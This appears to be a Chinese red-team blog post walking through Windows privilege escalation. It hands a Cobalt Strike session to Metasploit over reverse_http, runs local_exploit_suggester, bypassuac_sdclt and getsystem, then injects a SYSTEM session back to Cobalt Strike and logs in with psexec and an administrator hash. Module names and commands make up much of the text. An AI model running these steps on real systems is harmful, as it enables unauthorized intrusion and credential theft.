大家好,这里是 渗透攻击红队 的第 70 篇文章,本公众号会记录一些红队攻击的案例,不定时更新!请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关!
最近遇到一台机器,打了几百个补丁用各种漏洞提权都无果,最后使用 Metasploit 自带的模块把他的特权提升了,这才提权成功,看文章吧!
利用 Metasploit 进行提权
提权过程
首先是发现目标有 200 多个补丁:
随后我根据补丁号去查询相应的 EXP 去尝试提权发现都失败了,这个时候我把 CobaltStrike 的 Shell 互传到了 Metasploit:
MSF:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
CS:
创建监听器windows/foreign/reverse_http
执行监听器 spawn msf
然后通过 Metasploit 的提权检测找到了几个 exp :
run post/multi/recon/local_exploit_suggester
然后利用模块尝试提权:
exploit/windows/local/bypassuac_sdclt
这个时候弹回来了一个 Meterpreter,发现用户没变,但是当前特权多了很多:
然后直接 getsystem 提权到 SYSTEM:
最后利用 Metasploit 把 SYSYEM 的 shell 传到 CobaltStrike:
MSF:
background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set session 3
run
CS:
windows/beacon_http/reverse_http
这个时候目标 user 还是没改变,但是实际上特权已经有了!可以直接 getsystem:
最后抓到 administrator 的密码后,利用本地管理员的账号 hash ,直接本地 psexec 利用本地 administrator 的密码上线:
这个时候发现就是一个 SYSTEM 的 Beacon 会话了!实战情况下 CobaltStrike 提权不成功,就尝试利用 Metasploit 来尝试提权,兴许会有办法!